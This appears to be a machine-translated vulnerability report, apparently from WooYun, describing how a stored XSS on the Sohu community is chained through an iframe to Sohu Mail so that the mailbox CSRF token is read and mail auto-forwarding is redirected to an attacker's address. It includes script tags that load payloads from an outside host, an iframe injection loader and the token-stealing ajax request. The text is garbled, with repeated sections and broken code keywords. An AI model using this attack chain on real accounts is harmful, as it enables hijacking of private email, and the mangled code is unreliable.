Use Sohu mailbox XSS to hijack user mail

Use Sohu mailbox XSS to hijack user mail

Use Sohu mailbox XSS to hijack user mail

1. This vulnerability exploits functions.
 

ContentWindow2. This function allows the parent window to obtain the content of the subwindow, provided that the content of the subwindow is in the same domain. For example, I can obtain the content of Sohu MAIL FROM THE Sohu community,

3. next, I don't need to talk about it. I just need to find an XSS from the Sohu community, so I can go directly to the XSS Sohu mailbox and find a previously submitted XSS. If you haven't fixed it, I will use it.


WooYun: Dom xss in Sohu community. You can modify the title and content of a user post (xss filter bypass)


4. I will not elaborate on XSS. The above connection, so I inserted XSS code in the place signed by the Sohu community.
 

<Script pre = "" src = "http://q601333824.sinaapp.com/xss1.js">




Bytes

 

<script src="http://q601333824.sinaapp.com/xss1.js"


       






Bytes ------------------------------------------------------------------------------------------





5. I know this problem exists, but how can I hijack user emails and use the automatic mail forwarding function?

    






6. The automatic forwarding function has the csrf-token, but the csrf-token is stored in the webpage. Now that XSS can be used in Sohu mail, you can get the csrf-token,

    

①. Displayed in source code






②. I directly obtained the csrf-token from Sohu's mailbox in the Sohu community.



     






------------------------------------------------------------------------------







6. the next step is to simulate post submission. You can use $. ajax, custom request header, submit csrf-token, but Sohu does not seem to support $. ajax ., prompt: This method cannot be found because the jquery library is not installed.



   






7. So we can introduce a jquery library by ourselves. (here I will use the jquery library of w3c cainiao tutorial)



    








8. So the final code has two ends, the first section



① In the first section, this code is used to load the jquery library, so that Sohu mailbox can support ajax, and then inject XSS code into Sohu mailbox in the subwindow:

   
var t=document.createElement("iframe");
t.setAttribute("src","http://mail.sohu.com/");
t.height="700";
t.width="700";
t.id="xss123";
document.body.appendChild(t);
function aaa(){
    var ccc=document.getElementById("xss123").contentWindow;
    var k=ccc.document.createElement("script"); k.setAttribute("src","http://www.w3school.com.cn/jquery/jquery.js");ccc.document.body.appendChild(k);
    var b=ccc.document.createElement("script"); b.setAttribute("src","http://q601333824.sinaapp.com/xss2.js");ccc.document.body.appendChild(b);
    
}
setTimeout("aaa()",3000);//






②. The second paragraph of the Code indicates that the automatic forwarding settings seem to be submitted by put in order to capture the csrf-token of the mailbox and submit the put.

      
Var token = document. getElementById ("csrf-token"). content; // get csrf-token
Var url = location. href; // get the user url, because each person is different
Var url2 = url. replace ("main", "profile"); // replace it with the post address.
$. Ajax ({
Url: url2,
Data: {"autoreplyenable": "false", "startyear": "2015", "startmonth": "5", "startmonth": "5", "forwardenable ": "true", "forward": "[email protected]", "_ method": "put"}, // email address forwarded by the forward code
Type: "PUT ",
BeforeSend: function (xhr) {xhr. setRequestHeader ('x-CSRF-token', Token );},
Success: function (data ){
Alert (data );
}
});






Bytes -------------------------------------------------------------------------------------------





9. Test (XSS can be triggered in the post. For details, refer to the above XSS vulnerability connection)



① Load the jquery Library first, then load the xss2 connection, then put and submit, and modify the forwarding mail settings.

     






②.






③.






----------------------------------------------------------------------------------





10. The result is that the forwarding settings of Sohu mail are changed to [email protected ].

    

   


   

    
Proof of vulnerability:
   



1. Check the vulnerability proof above.







2. ① load the jquery Library first, then load the xss2 connection, then put and submit, and modify the forwarding mail settings.

     






②.






③.






----------------------------------------------------------------------------------





10. The result is that the forwarding settings of Sohu mail are changed to [email protected ].

    

   
 
Solution:


1. Do not think that XSS repair will be okay. It must be a temporary solution, because there are many XSS websites that are already large (= _ =)





2. You are better than me.
</Script>